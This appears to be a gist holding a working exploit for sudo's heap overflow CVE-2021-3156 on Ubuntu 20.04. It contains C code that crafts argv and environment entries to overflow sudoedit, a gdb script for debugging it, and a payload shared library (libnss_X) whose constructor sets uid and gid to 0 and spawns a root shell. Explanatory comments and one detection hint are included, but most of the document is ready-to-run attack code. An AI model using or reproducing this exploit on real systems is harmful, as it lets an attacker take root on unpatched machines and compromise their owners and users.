CVE-2021-3156-exploit
#define _GNU_SOURCE | |
#include <stdio.h> | |
#include <unistd.h> | |
#include <string.h> | |
/* | |
author: swing @ bestswngs@gmail.com | |
swpwn-pd@ubuntu:~/glibc-2.31$ uname -a | |
Linux ubuntu 5.8.0-41-generic #46~20.04.1-Ubuntu SMP Mon Jan 18 17:52:23 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux | |
swpwn-pd@ubuntu:~/glibc-2.31$ cat /etc/issue | |
Ubuntu 20.04.1 LTS \n \l | |
*/ | |
#define REP0(X) | |
#define REP1(X) X, | |
#define REP2(X) REP1(X) X, | |
#define REP3(X) REP2(X) X, | |
#define REP4(X) REP3(X) X, | |
#define REP5(X) REP4(X) X, | |
#define REP6(X) REP5(X) X, | |
#define REP7(X) REP6(X) X, | |
#define REP8(X) REP7(X) X, | |
#define REP9(X) REP8(X) X, | |
#define REP10(X) REP9(X) X, | |
#define REP100(X) \ | |
REP10(X) REP10(X) REP10(X) REP10(X) REP10(X) \ | |
REP10(X) REP10(X) REP10(X) REP10(X) REP10(X) | |
#define REP1000(X) \ | |
REP100(X) REP100(X) REP100(X) REP100(X) REP100(X) \ | |
REP100(X) REP100(X) REP100(X) REP100(X) REP100(X) | |
/*
 * Entry point: assembles an argv and an environment block, then replaces
 * this process with /usr/bin/sudoedit via execve(2).  Per the header
 * comment the tested target was Ubuntu 20.04.1 / glibc 2.31.  Everything
 * below is byte-layout sensitive (buffer sizes, the trailing backslash+NUL
 * pairs, the exact number of "\\"-only environment entries produced by the
 * REP* macros), so sizes and statement order are kept exactly as written.
 * execve() only returns on failure; that failure is not checked, and main
 * then falls off the end (implicit return 0 in C99+).
 */
int main(){
    /* obuf: 0x190 bytes of 'B', ending in a backslash (0x5c) and a NUL.
     * obufsz is a non-const int, so obuf is a VLA and sizeof(obuf) is
     * evaluated at run time (== obufsz). */
    int obufsz = 0x190;
    char obuf[obufsz];
    memset(obuf, 'B', sizeof(obuf));
    obuf[obufsz-2] = 0x5c;   /* 0x5c == '\\' */
    obuf[obufsz-1] = 0x00;

    /* env_val: 8 x 'Q' then (0xd0 - 8) x 'A', NUL-terminated at index 0xd0.
     * env_cont wraps it into one "LC_ALL=C.UTF-8@<value>" environment entry.
     * Both arrays are 0x1000 bytes; the sprintf() result is 15 + 0xd0 + 1
     * = 0xe0 bytes, so it fits. */
    char env_cont[0x1000];
    char env_val[0x1000];
    int env_valsz = 0xd0;
    memset(env_val,'Q',8);
    memset(env_val+8,'A',env_valsz-8);
    env_val[env_valsz] = '\0';
    sprintf(env_cont,"LC_ALL=C.UTF-8@%s",env_val);

    /* argv of the exec'd program: sudoedit -s <obuf> "\" */
    char *args[] = {
        "/usr/bin/sudoedit",
        "-s",
        obuf,
        "\\",
        NULL
    };

    /* pad1: 8 bytes, six 'C' then the same backslash+NUL tail as obuf. */
    int PAD1SZ = 8;
    char pad1[PAD1SZ] ;
    memset(pad1, 'C', sizeof(pad1));
    pad1[PAD1SZ-2]= 0x5c;
    pad1[PAD1SZ-1]= 0x00;

    /* Despite its name, extra_args is the *environment* (envp) handed to
     * execve(), not additional argv entries.  Each REPn("\\") expands to n
     * comma-separated "\\" string literals: 1000 entries before "AAA\\",
     * then 100 + 5*10 + 7 = 157 entries before "X/X\\". */
    char *extra_args[] = {
        pad1,
        REP1000("\\")
        "AAA\\",
        REP100("\\")
        REP10("\\")
        REP10("\\")
        REP10("\\")
        REP10("\\")
        REP10("\\")
        REP7("\\")
        "X/X\\",
        "a",
        env_cont,
        NULL,
    };

    /* Return value intentionally ignored in the original; a failed exec is
     * therefore silent. */
    execve(args[0], args, extra_args);
    // execvpe("./sudoedit", args, extra_args);
}
# gcc CVE-2021-3156-exploit.c -o exploit
# gdb ./exploit -x gdbscript
#
# Debugging aid for the program above: the binary itself only calls
# execve(), so the interesting code runs in the exec'd sudoedit image.
# Stop at the exec, switch to the new image, then set breakpoints inside it.
catch exec
# Allow breakpoints on symbols that are not resolvable yet (they live in
# the exec'd image / its shared libraries) without prompting.
set breakpoint pending on
# After the exec, debug the new program image rather than the old one.
set follow-exec-mode new
r
# Conditional breakpoint on free(): only fires when r15 == 0xc and r8 == 0.
# The significance of these register values is not explained in the gist.
b free if $r15==0xc && $r8==0
# Stop when glibc's internal dlopen entry point is reached.
b __libc_dlopen_mode
#include <unistd.h> | |
#include <stdio.h> | |
#include <stdlib.h> | |
#include <string.h> | |
/* | |
mkdir libnss_X | |
gcc -Os -Wall -Wextra -fPIC -shared inject.c -o libnss_X/X.so.2 | |
*/ | |
/*
 * Constructor of the companion shared object (built as libnss_X/X.so.2 per
 * the header comment), so it runs automatically when the library is loaded.
 * It prints a marker, sets the real and effective uid/gid to 0 and replaces
 * the process with /bin/sh.  None of the set*id() or execv() return values
 * are checked.
 *
 * Naming: `_init` is a reserved identifier (leading underscore at file
 * scope) and is also the traditional ELF init symbol; `static` keeps it out
 * of the dynamic symbol table, but a non-reserved name would be cleaner.
 * Defensive note: a libnss_*.so.2 that is not part of the distribution's
 * package set is a strong indicator worth alerting on.
 */
static void __attribute__ ((constructor)) _init(void);
static void _init(void) {
    /* No fflush() before execv(): if stdout is not line-buffered (e.g. a
     * pipe) this marker can be lost when the process image is replaced. */
    printf("[+] getroot!\n");
    setuid(0); seteuid(0); setgid(0); setegid(0);
    static char *a_argv[] = { "sh", NULL };
    /* a_envp is never used: execv() passes the caller's environment
     * through unchanged, so the PATH entry below has no effect. */
    static char *a_envp[] = { "PATH=/bin:/usr/bin:/sbin", NULL };
    execv("/bin/sh", a_argv);
}